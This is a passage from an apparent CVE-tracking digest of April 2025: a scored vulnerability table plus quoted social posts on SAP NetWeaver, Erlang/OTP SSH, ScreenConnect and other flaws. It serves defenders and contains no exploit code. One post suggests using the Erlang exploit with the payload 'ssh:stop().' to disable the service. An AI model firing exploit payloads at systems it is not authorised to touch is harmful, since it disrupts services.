## Updated at UTC 2025-04-26T05:03:55.977040

| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2025-31324 | 10.0 | 0.04% | 9 | 1 | | 2025-04-26T01:15:41.930000 | SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper a |
| CVE-2025-32433 | 10.0 | 3.62% | 16 | 17 | template | 2025-04-25T23:15:16.993000 | Erlang/OTP is a set of libraries for the Erlang programming language. Prior to v |
| CVE-2025-3935 | 8.1 | 0.00% | 2 | 0 | | 2025-04-25T21:31:39 | ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewS |
| CVE-2025-2069 | 5.0 | 0.00% | 2 | 0 | | 2025-04-25T18:31:19 | A cross-site scripting vulnerability was reported in the FileZ client that could |
| CVE-2025-3928 | 8.8 | 0.00% | 2 | 0 | | 2025-04-25T18:31:12 | Commvault Web Server has an unspecified vulnerability that can be exploited by a |
| CVE-2025-3634 | 4.3 | 0.00% | 4 | 0 | | 2025-04-25T16:30:58 | A security vulnerability was discovered in Moodle that allows students to enroll |
| CVE-2024-6199 | None | 0.00% | 2 | 0 | | 2025-04-25T15:31:29 | An unauthenticated attacker on the WAN interface, with the ability to intercept |
| CVE-2024-6198 | None | 0.00% | 4 | 0 | | 2025-04-25T15:31:29 | The device exposes a web interface on ports TCP/3030 and TCP/9882. This web serv |
| CVE-2025-43946 | 9.8 | 0.29% | 1 | 0 | | 2025-04-25T15:31:21 | TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload |
| CVE-2025-32431 | None | 0.07% | 1 | 0 | | 2025-04-25T14:41:50 | ## Impact There is a potential vulnerability in Traefik managing the requests u |
| CVE-2025-46616 | 10.0 | 0.18% | 1 | 0 | | 2025-04-25T09:31:56 | Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code |
| CVE-2025-43859 | 9.1 | 0.03% | 1 | 0 | | 2025-04-24T21:41:39 | ### Impact A leniency in h11's parsing of line terminators in chunked-coding me |
| CVE-2024-32752 | 9.1 | 0.21% | 1 | 0 | | 2025-04-24T21:32:50 | Under certain circumstances communications between the ICU tool and an iSTAR Pro |
| CVE-2025-26382 | None | 0.04% | 2 | 0 | | 2025-04-24T21:31:54 | Under certain circumstances the iSTAR Configuration Utility (ICU) tool could hav |
| CVE-2025-43858 | 9.2 | 0.02% | 1 | 0 | | 2025-04-24T19:20:07 | ## Summary This vulnerability only apply when running on a Windows OS. An unsafe |
| CVE-2025-43928 | 5.8 | 0.04% | 2 | 0 | | 2025-04-24T18:32:12 | In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654 |
| CVE-2025-28020 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vu |
| CVE-2025-28021 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu |
| CVE-2025-28028 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU |
| CVE-2025-28022 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu |
| CVE-2025-27820 | 7.5 | 0.01% | 1 | 0 | | 2025-04-24T16:36:11 | A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, |
| CVE-2025-43919 | 5.8 | 0.16% | 3 | 2 | | 2025-04-24T16:22:37.117000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac |
| CVE-2025-43920 | 5.4 | 0.12% | 2 | 1 | | 2025-04-24T16:20:36.953000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver |
| CVE-2025-43921 | 5.3 | 0.03% | 3 | 1 | | 2025-04-24T16:16:59.597000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac |
| CVE-2025-43855 | None | 0.07% | 1 | 0 | | 2025-04-24T16:03:58 | ### Summary An unhandled error is thrown when validating invalid connectionPara |
| CVE-2025-30408 | 6.7 | 0.01% | 1 | 0 | | 2025-04-24T15:31:46 | Local privilege escalation due to insecure folder permissions. The following pro |
| CVE-2025-46421 | 6.8 | 0.03% | 1 | 0 | | 2025-04-24T15:31:44 | A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, th |
| CVE-2025-30409 | 5.5 | 0.01% | 1 | 0 | | 2025-04-24T15:31:44 | Denial of service due to allocation of resources without limits. The following p |
| CVE-2025-3872 | 7.2 | 0.02% | 1 | 0 | | 2025-04-24T12:31:35 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti |
| CVE-2024-12244 | 4.3 | 0.01% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered in access controls could allow users to view certai |
| CVE-2025-1908 | 7.7 | 0.01% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered in GitLab EE/CE that could allow an attacker to tra |
| CVE-2025-0639 | 6.5 | 0.03% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered affecting service availability via issue preview in |
| CVE-2025-32730 | 5.5 | 0.03% | 1 | 0 | | 2025-04-24T09:30:40 | Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool af |
| CVE-2025-1731 | 7.8 | 0.01% | 4 | 0 | | 2025-04-24T06:30:31 | An incorrect permission assignment vulnerability in the PostgreSQL commands of t |
| CVE-2025-1976 | None | 0.03% | 1 | 0 | | 2025-04-24T03:31:38 | Brocade Fabric OS versions starting with 9.1.0 have root access removed, however |
| CVE-2025-46419 | 5.9 | 0.06% | 1 | 0 | | 2025-04-24T03:31:38 | Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet. |
| CVE-2025-32818 | 7.5 | 0.04% | 1 | 0 | | 2025-04-23T21:30:42 | A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office in |
| CVE-2025-32969 | None | 0.24% | 1 | 0 | | 2025-04-23T19:15:38 | ### Impact It is possible for a remote unauthenticated user to escape from the |
| CVE-2025-2773 | 7.2 | 0.33% | 1 | 0 | | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers sys ping Command Injection Remote Code Executi |
| CVE-2025-2772 | 5.3 | 0.03% | 1 | 0 | | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers Insufficiently Protected Credentials Informati |
| CVE-2025-2770 | 4.9 | 0.10% | 1 | 0 | | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Cleartext Password Storage Information Disclos |
| CVE-2025-2771 | 5.3 | 0.10% | 1 | 0 | | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vuln |
| CVE-2025-2767 | 8.8 | 0.21% | 1 | 0 | | 2025-04-23T18:31:00 | Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnera |
| CVE-2025-27087 | 5.5 | 0.01% | 1 | 0 | | 2025-04-23T15:32:02 | A vulnerability in the kernel of the Cray Operating System (COS) could allow an |
| CVE-2024-33452 | 7.7 | 0.11% | 1 | 0 | | 2025-04-23T14:08:13.383000 | An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote atta |
| CVE-2025-1951 | 8.4 | 0.01% | 1 | 0 | | 2025-04-23T14:08:13.383000 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co |
| CVE-2025-29660 | 9.8 | 0.07% | 1 | 0 | | 2025-04-23T14:08:13.383000 | A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, w |
| CVE-2025-29659 | 9.8 | 0.21% | 1 | 0 | | 2025-04-23T14:08:13.383000 | Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_ |
| CVE-2025-2703 | 6.8 | 0.01% | 2 | 0 | | 2025-04-23T12:31:31 | The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user |
| CVE-2025-2595 | 5.3 | 0.02% | 1 | 0 | | 2025-04-23T09:33:37 | An unauthenticated remote attacker can bypass the user management in CODESYS Vis |
| CVE-2025-0926 | 5.9 | 0.01% | 1 | 0 | | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that |
| CVE-2025-1056 | 6.1 | 0.01% | 1 | 0 | | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified |
| CVE-2025-46221 | None | 0.00% | 1 | 0 | | 2025-04-23T03:30:35 | Rejected reason: Not used |
| CVE-2025-1021 | 7.5 | 0.04% | 1 | 0 | | 2025-04-23T03:30:30 | Missing authorization vulnerability in synocopy in Synology DiskStation Manager |
| CVE-2025-32965 | None | 0.04% | 1 | 1 | | 2025-04-22T23:53:56 | ### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised a |
| CVE-2025-34028 | 10.0 | 0.31% | 13 | 2 | | 2025-04-22T18:32:18 | A path traversal vulnerability in Commvault Command Center Innovation Release al |
| CVE-2025-27086 | 8.1 | 0.06% | 2 | 0 | | 2025-04-22T15:31:59 | Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPC |
| CVE-2025-1950 | 9.4 | 0.01% | 2 | 0 | | 2025-04-22T15:30:58 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co |
| CVE-2025-1732 | 6.7 | 0.01% | 1 | 0 | | 2025-04-22T03:30:32 | An improper privilege management vulnerability in the recovery function of the U |
| CVE-2025-43972 | 6.8 | 0.06% | 1 | 0 | | 2025-04-21T21:55:34 | An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in |
| CVE-2025-43971 | 8.6 | 0.04% | 1 | 0 | | 2025-04-21T21:55:26 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows att |
| CVE-2025-43970 | 4.3 | 0.02% | 1 | 0 | | 2025-04-21T21:55:19 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not p |
| CVE-2025-32408 | 2.5 | 0.01% | 1 | 0 | | 2025-04-21T17:15:24.117000 | In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is |
| CVE-2025-43916 | 3.4 | 0.03% | 1 | 0 | | 2025-04-21T14:23:45.950000 | Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is use |
| CVE-2025-43973 | 6.8 | 0.04% | 1 | 0 | | 2025-04-21T14:23:45.950000 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not v |
| CVE-2025-43918 | 6.4 | 0.01% | 1 | 0 | | 2025-04-20T00:31:48 | SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, pro |
| CVE-2025-3803 | 8.8 | 0.05% | 1 | 0 | | 2025-04-19T15:30:28 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h |
| CVE-2025-3802 | 8.8 | 0.05% | 1 | 0 | | 2025-04-19T15:30:23 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h |
| CVE-2025-32434 | None | 0.41% | 2 | 0 | | 2025-04-18T18:34:25 | # Description I found a Remote Command Execution (RCE) vulnerability in the PyTo |
| CVE-2025-42599 | 9.8 | 0.30% | 2 | 0 | | 2025-04-18T15:31:44 | Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffe |
| CVE-2025-24054 | 6.5 | 17.54% | 4 | 3 | | 2025-04-18T14:15:17.677000 | External control of file name or path in Windows NTLM allows an unauthorized att |
| CVE-2025-2567 | 9.8 | 0.05% | 1 | 0 | | 2025-04-15T21:31:48 | An attacker could modify or disable settings, disrupt fuel monitoring and suppl |
| CVE-2025-3587 | 6.3 | 0.04% | 1 | 0 | | 2025-04-15T18:39:27.967000 | A vulnerability classified as critical was found in ZeroWdd/code-projects studen |
| CVE-2025-33028 | 6.1 | 0.04% | 1 | 0 | | 2025-04-15T18:31:58 | In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because |
| CVE-2025-2636 | 9.8 | 0.25% | 1 | 0 | | 2025-04-11T15:39:52.920000 | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vul |
| CVE-2025-0120 | 0 | 0.02% | 1 | 0 | | 2025-04-11T15:39:52.920000 | A vulnerability with a privilege management mechanism in the Palo Alto Networks |
| CVE-2025-3248 | 9.8 | 80.91% | 2 | 4 | template | 2025-04-10T01:59:49 | Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/ |
| CVE-2025-21204 | 7.8 | 0.07% | 4 | 0 | | 2025-04-08T18:34:49 | Improper link resolution before file access ('link following') in Windows Update |
| CVE-2024-48887 | 9.8 | 0.09% | 1 | 2 | | 2025-04-08T18:34:48 | A unverified password change vulnerability in Fortinet FortiSwitch GUI may allo |
| CVE-2025-29927 | 9.1 | 92.56% | 1 | 81 | template | 2025-03-28T15:32:59 | # Impact It is possible to bypass authorization checks within a Next.js applicat |
| CVE-2024-54085 | None | 0.11% | 1 | 0 | | 2025-03-28T15:32:58 | AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authe |
| CVE-2025-1974 | 9.8 | 80.23% | 1 | 17 | template | 2025-03-25T15:10:16 | A security issue was discovered in Kubernetes where under certain conditions, an |
| CVE-2025-27840 | 6.8 | 0.07% | 1 | 3 | | 2025-03-11T18:32:12 | Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory |
| CVE-2025-27610 | 7.5 | 0.09% | 6 | 0 | | 2025-03-10T23:15:35.073000 | Rack provides an interface for developing web applications in Ruby. Prior to ver |
| CVE-2025-0725 | 7.3 | 0.21% | 1 | 0 | | 2025-03-07T03:31:33 | When libcurl is asked to perform automatic gzip decompression of content-encoded |
| CVE-2025-27111 | 0 | 0.12% | 4 | 0 | | 2025-03-04T16:15:40.487000 | Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs |
| CVE-2022-42475 | 9.8 | 93.18% | 1 | 7 | | 2025-02-24T18:32:12 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th |
| CVE-2025-25184 | 0 | 0.10% | 4 | 0 | | 2025-02-14T20:15:34.350000 | Rack provides an interface for developing web applications in Ruby. Prior to ver |
| CVE-2025-0282 | 9.1 | 92.34% | 7 | 10 | | 2025-01-28T18:32:27 | A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, |
| CVE-2018-0171 | 9.8 | 89.10% | 1 | 2 | | 2025-01-27T21:31:51 | A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS |
| CVE-2024-21762 | 9.8 | 91.37% | 1 | 8 | | 2024-11-29T15:23:32.167000 | A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 th |
| CVE-2024-9441 | 9.8 | 57.36% | 1 | 4 | | 2024-10-02T21:30:35 | The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS comma |
| CVE-2024-6235 | None | 21.21% | 1 | 0 | template | 2024-07-31T05:02:58 | Sensitive information disclosure in NetScaler Console |
| CVE-2020-5902 | 9.8 | 94.44% | 1 | 57 | template | 2024-07-25T18:33:36 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12. |
| CVE-2024-6407 | 9.8 | 0.14% | 1 | 0 | | 2024-07-11T12:30:56 | CWE-200: Information Exposure vulnerability exists that could cause disclosure o |
| CVE-2023-27997 | 9.8 | 91.01% | 1 | 10 | | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an |
| CVE-2024-3094 | 10.0 | 90.84% | 1 | 62 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
| CVE-2022-42889 | 9.8 | 94.16% | 1 | 49 | template | 2024-01-19T20:49:34 | Apache Commons Text performs variable interpolation, allowing properties to be d |
| CVE-2025-3132 | 0 | 0.00% | 2 | 1 | | N/A | |
| CVE-2025-22234 | 0 | 0.00% | 3 | 0 | | N/A | |
| CVE-2025-1763 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2025-2443 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2024-55571 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2025-21605 | 0 | 0.03% | 1 | 0 | | N/A | |
| CVE-2025-32966 | 0 | 0.04% | 1 | 0 | | N/A | |
| CVE-2025-32958 | 0 | 0.04% | 1 | 0 | | N/A | |
| CVE-2025-32438 | 0 | 0.01% | 1 | 0 | | N/A | |

CVE-2025-31324
(10.0 CRITICAL)

EPSS: 0.04%

updated 2025-04-26T01:15:41.930000

9 posts

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

1 repos

https://github.com/rxerium/CVE-2025-31324

patrickcmiller at 2025-04-25T21:12:12.826Z ##

SAP zero-day vulnerability under widespread active exploitation cyberscoop.com/sap-netweaver-z

##

AAKL at 2025-04-25T16:48:43.342Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable

##

cR0w at 2025-04-25T14:29:09.143Z ##

@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.

##

jbhall56@infosec.exchange at 2025-04-25T10:53:23.000Z ##

Tracked as CVE-2025-31324 (CVSS score of 10/10), the security defect is described as the lack of proper authorization (missing authorization check) in the Visual Composer Metadata Uploader component of SAP NetWeaver. securityweek.com/sap-zero-day-

##

DarkWebInformer@infosec.exchange at 2025-04-24T19:15:01.000Z ##

🚨SAP NetWeaver Vulnerability (CVE-2025-31324) Allows Remote Code Execution via File Upload Flaw

darkwebinformer.com/sap-netwea

##

cR0w@infosec.exchange at 2025-04-24T17:20:17.000Z ##

A perfect 10 in SAP NetWeaver? Yes please. 🥳

me.sap.com/notes/3594142

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

nvd.nist.gov/vuln/detail/CVE-2

##

cR0w at 2025-04-25T21:22:47.096Z ##

Cisco updated the list again. Here are the currently listed Cisco systems vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold ):

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • Ultra Services Platform
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • Cloud Native Broadband Network Gateway
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Policy Control Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software

##

AAKL at 2025-04-25T16:00:17.041Z ##

This was updated yesterday.

Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) sec.cloudapps.cisco.com/securi @TalosSecurity

##

cR0w at 2025-04-25T13:39:46.629Z ##

For those playing along at home, here are the currently listed Cisco systems vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software
  • Virtualized Infrastructure Manager
  • Catalyst Center, formerly DNA Center
  • Ultra Cloud Core - Policy Control Function

##

jbhall56@infosec.exchange at 2025-04-25T11:25:42.000Z ##

Cisco is investigating the impact of the Erlang/OTP remote code execution vulnerability CVE-2025-32433 on its products. securityweek.com/cisco-confirm

##

hdm@infosec.exchange at 2025-04-24T04:50:42.000Z ##

A few quick notes on the Erlang OTP SSHd RCE (CVE-2025-32433):

1. Cisco confirmed that ConfD and NSO products are affected (ports 830, 2022, and 2024 versus 22)

2. Signatures looking for clear-text channel open and exec calls will miss exploits that deliver the same payloads after the key exchange.

3. If you find a machine in your environment and can't disable the service, running the exploit with the payload `ssh:stop().` will shut down the SSH service temporarily.

runzero.com/blog/erlang-otp-ss

##

sambowne@infosec.exchange at 2025-04-23T23:23:37.000Z ##

How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed | Platform Security Blog platformsecurity.com/blog/CVE-

##

AAKL@infosec.exchange at 2025-04-23T17:07:37.000Z ##

Cisco, published yesterday (critical): Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433 sec.cloudapps.cisco.com/securi @TalosSecurity #cybersecurity #infosec

##

cR0w@infosec.exchange at 2025-04-23T13:47:11.000Z ##

If your company sells a product with limited visibility into the underlying systems ( network appliances, etc. ) and you have not yet published an advisory or doc stating whether or not your products are impacted by the Erlang / OTP perfect 10 CVE-2025-32433, then you are not my friend and I hope you step on a lego in the middle of the night.

##

researchbuzz_firehose@rbfirehose.com at 2025-04-23T08:14:16.000Z ##

The Register: Today’s LLMs craft exploits from patches at lightning speed. “Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang’s SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help – the model was able to use code from an already published patch in the […]

https://rbfirehose.com/2025/04/23/the-register-todays-llms-craft-exploits-from-patches-at-lightning-speed/

##

jos1264@social.skynetcloud.site at 2025-04-22T12:15:03.000Z ##

PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) helpnetsecurity.com/2025/04/22 #RuhrUniversityBochum #ArcticWolfNetworks #PlatformSecurity #vulnerability #Horizon3ai #ProDefense #Don'tmiss #Hotstuff #exploit #News #PoC #SSH

##

jos1264@social.skynetcloud.site at 2025-04-21T22:10:02.000Z ##

Erlang/OTP RCE (CVE-2025-32433) fortiguard.fortinet.com/threat

##

oversecurity@mastodon.social at 2025-04-19T21:10:09.000Z ##

Critical Erlang/OTP SSH RCE bug now has public exploits, patch now

Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to...

🔗️ [Bleepingcomputer] link.is.it/weapzq

##

AAKL@infosec.exchange at 2025-04-19T15:46:36.000Z ##

Picus: CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability Explained picussecurity.com/resource/blo #cybersecurity #Infosec

##

CVE-2025-3935
(8.1 HIGH)

EPSS: 0.00%

updated 2025-04-25T21:31:39

2 posts

ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewState code injection attack. ASP.NET Web Forms use ViewState to preserve page and control state, with data encoded using Base64 protected by machine keys.  It is important to note that to obtain these machine keys, privileged system level access must be obtained. If these machine keys are compromised, attackers coul

cR0w at 2025-04-25T18:46:40.755Z ##

Looks like there's a CVE for yesterday's ScreenConnect vuln now.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2069
(5.0 MEDIUM)

EPSS: 0.00%

updated 2025-04-25T18:31:19

2 posts

A cross-site scripting vulnerability was reported in the FileZ client that could allow execution of code if a crafted url is visited by a local user.

cR0w at 2025-04-25T16:15:42.091Z ##

Three vulns published in FileZ, all sev:MED 5.1 but this one sounded more interesting:

The FileZ client reported a cross-site scripting vulnerability: if a local user visits a forged link, code may be executed. CVE-2025-2069

Translation via LibreWolf:

The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069

filez.com/securityPolicy/2.htm

##

CVE-2025-3928
(8.8 HIGH)

EPSS: 0.00%

updated 2025-04-25T18:31:12

2 posts

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

cR0w at 2025-04-25T16:55:18.640Z ##

CVE published for a Commvault advisory from last month about "an unspecified vulnerability".

documentation.commvault.com/se

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3634
(4.3 MEDIUM)

EPSS: 0.00%

updated 2025-04-25T16:30:58

4 posts

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

darisan@openbiblio.social at 2025-04-25T19:30:14.000Z ##

"Too much interest in Moodle courses" isn't really that common a security problem at universities, is it? access.redhat.com/security/cve #Moodle #CVE

##

cR0w at 2025-04-25T15:25:23.690Z ##

Who wants to skip courses in Moodle?

access.redhat.com/security/cve

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

##

CVE-2024-6199
(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-25T15:31:29

2 posts

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

cR0w at 2025-04-25T13:47:43.282Z ##

Who doesn't like RCE in Viasat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-6198
(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-25T15:31:29

4 posts

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

cR0w at 2025-04-25T13:47:43.282Z ##

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

_r_netsec at 2025-04-25T13:28:06.431Z ##

Remote Code Execution on Viasat Modems (CVE-2024-6198) onekey.com/resource/security-a

##

cR0w@infosec.exchange at 2025-04-25T13:47:43.000Z ##

